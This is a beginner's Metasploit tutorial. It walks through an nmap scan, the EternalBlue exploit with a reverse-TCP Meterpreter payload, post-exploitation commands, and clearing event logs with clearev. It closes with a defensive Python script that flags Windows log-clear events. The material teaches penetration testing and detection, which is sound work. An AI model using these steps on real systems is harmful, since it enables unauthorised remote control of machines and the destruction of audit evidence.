Disclaimer
⚠️ This guide is strictly for educational purposes and cybersecurity awareness. Unauthorized hacking is illegal and punishable by law. Always use Metasploit on systems you have permission to test.
What is Metasploit?
Metasploit is a powerful framework used by security professionals to test system vulnerabilities. It allows ethical hackers to simulate real-world attacks to strengthen cybersecurity defenses.
Installing Metasploit
Metasploit comes pre-installed in Kali Linux, but you can install it manually on other operating systems.
For Kali Linux (Recommended): Metasploit is included in Kali Linux, but if needed, install it using:
sudo apt update && sudo apt install metasploit-framework -y
For Windows: Download the installer from the official Metasploit website and follow the on-screen instructions.
Launching Metasploit
After installation, launch Metasploit by opening a terminal and typing:
msfconsole
This will start the Metasploit framework and display its command-line interface.
Scanning the Target
Before exploiting a system, we need to gather information. This process is called reconnaissance.
Using Nmap, scan the target machine to find open ports and services:
nmap -sV -A <target-ip>
This command reports the target's services and their versions (-sV), its likely operating system, and the output of Nmap's default scripts (-A), which can point to vulnerabilities.
Choosing an Exploit
After scanning, we can look for exploits that match the discovered vulnerabilities.
For example, to search for SMB-related exploits, type:
search exploit smb
Metasploit will return a list of potential exploits. Choose the most relevant one by typing:
use exploit/windows/smb/ms17_010_eternalblue
This selects the "EternalBlue" exploit, which targets the MS17-010 SMBv1 vulnerability in unpatched Windows versions.
Configuring the Exploit
Before launching an attack, we need to set up the target IP and payload.
Set the target machine's IP address (the option is named RHOSTS in current Metasploit versions; RHOST is accepted as an alias in most modules):
set RHOSTS <target-ip>
Set the attacker's local IP address:
set LHOST <your-ip>
To find your IP, use the command ifconfig (Linux) or ipconfig (Windows).
Set the payload:
set payload windows/meterpreter/reverse_tcp
The payload determines what happens once the system is exploited. The "reverse TCP" payload opens a connection back to the attacker's system.
Check all settings:
show options
This command verifies that everything is correctly configured.
Running the Exploit
Once all settings are correct, execute the exploit:
exploit
If the attack is successful, Metasploit opens a Meterpreter session on the target system, from which you can browse its files and run commands.
Post-Exploitation
After gaining access, various commands can be executed:
Check system details:
sysinfo
Displays the target machine’s OS, architecture, and other system details.
List running processes:
ps
Shows all currently running processes on the target machine.
Take a screenshot:
screenshot
Captures the screen of the target system.
Open a command shell:
shell
Opens a direct command-line interface on the target machine, running with the privileges of the exploited process.
Covering Tracks and Exiting
To avoid leaving traces on the target system, clear the event logs. Note that Windows records the clearing itself (Event ID 1102 in the Security log, 104 in the System log), so this step is itself a detectable signal, and in an authorized test it destroys evidence the defending team may need for their review:
clearev
Exit the session cleanly:
exit
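From the defender's side, the clearev step above leaves its own fingerprint: Windows writes a "log cleared" event as the first entry of each emptied log. The following is an added detection example, not code from this guide or from Metasploit; it assumes the Windows logs were forwarded to a collector before any clearing, as a list of dicts with "log", "event_id", "time" (ISO 8601) and "user" fields, and the sample records are constructed for the demonstration.

```python
"""Detect Windows event-log clearing in a forwarded log feed.

Added example for this guide (not Metasploit's own code). Assumes the
Windows logs were forwarded before any clearing (e.g. to a SIEM) as a list
of dicts with "log", "event_id", "time" (ISO 8601) and "user" fields. The
sample records below are constructed for this demonstration.
"""
from datetime import datetime
from itertools import combinations

# Markers Windows writes when a log is cleared; they become the first
# entries of the freshly emptied log, so they survive the clearing itself.
LOG_CLEARED_MARKERS = {
    ("Security", 1102): "Security audit log cleared",
    ("System", 104): "System or Application log cleared",
}

# Constructed sample feed: a logon, the two clear markers, a service event.
SAMPLE_EVENTS = [
    {"log": "Security", "event_id": 4624, "time": "2024-05-01T10:02:11", "user": "alice"},
    {"log": "Security", "event_id": 1102, "time": "2024-05-01T10:41:03", "user": "SYSTEM"},
    {"log": "System", "event_id": 104, "time": "2024-05-01T10:41:04", "user": "SYSTEM"},
    {"log": "System", "event_id": 7036, "time": "2024-05-01T10:45:00", "user": "SYSTEM"},
]


def find_clear_markers(events):
    """Return one alert dict per log-cleared marker found in the feed."""
    alerts = []
    for ev in events:
        reason = LOG_CLEARED_MARKERS.get((ev["log"], ev["event_id"]))
        if reason:
            alerts.append({"time": ev["time"], "user": ev["user"], "reason": reason})
    return alerts


def clears_within_window(alerts, window_seconds=60):
    """True if markers for different logs fall inside one short window,
    i.e. several logs were wiped together (as a bulk clear does) rather
    than a single log being rotated by an administrator."""
    for a, b in combinations(alerts, 2):
        if a["reason"] == b["reason"]:
            continue
        ta, tb = datetime.fromisoformat(a["time"]), datetime.fromisoformat(b["time"])
        if abs((ta - tb).total_seconds()) <= window_seconds:
            return True
    return False


if __name__ == "__main__":
    found = find_clear_markers(SAMPLE_EVENTS)
    for alert in found:
        print(f"{alert['time']} {alert['user']}: {alert['reason']}")
    print("bulk clear:", clears_within_window(found))
```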
Conclusion
Metasploit is a powerful tool for ethical hacking and security testing. It allows security professionals to find and fix vulnerabilities before malicious hackers exploit them. Always use it responsibly and within legal boundaries.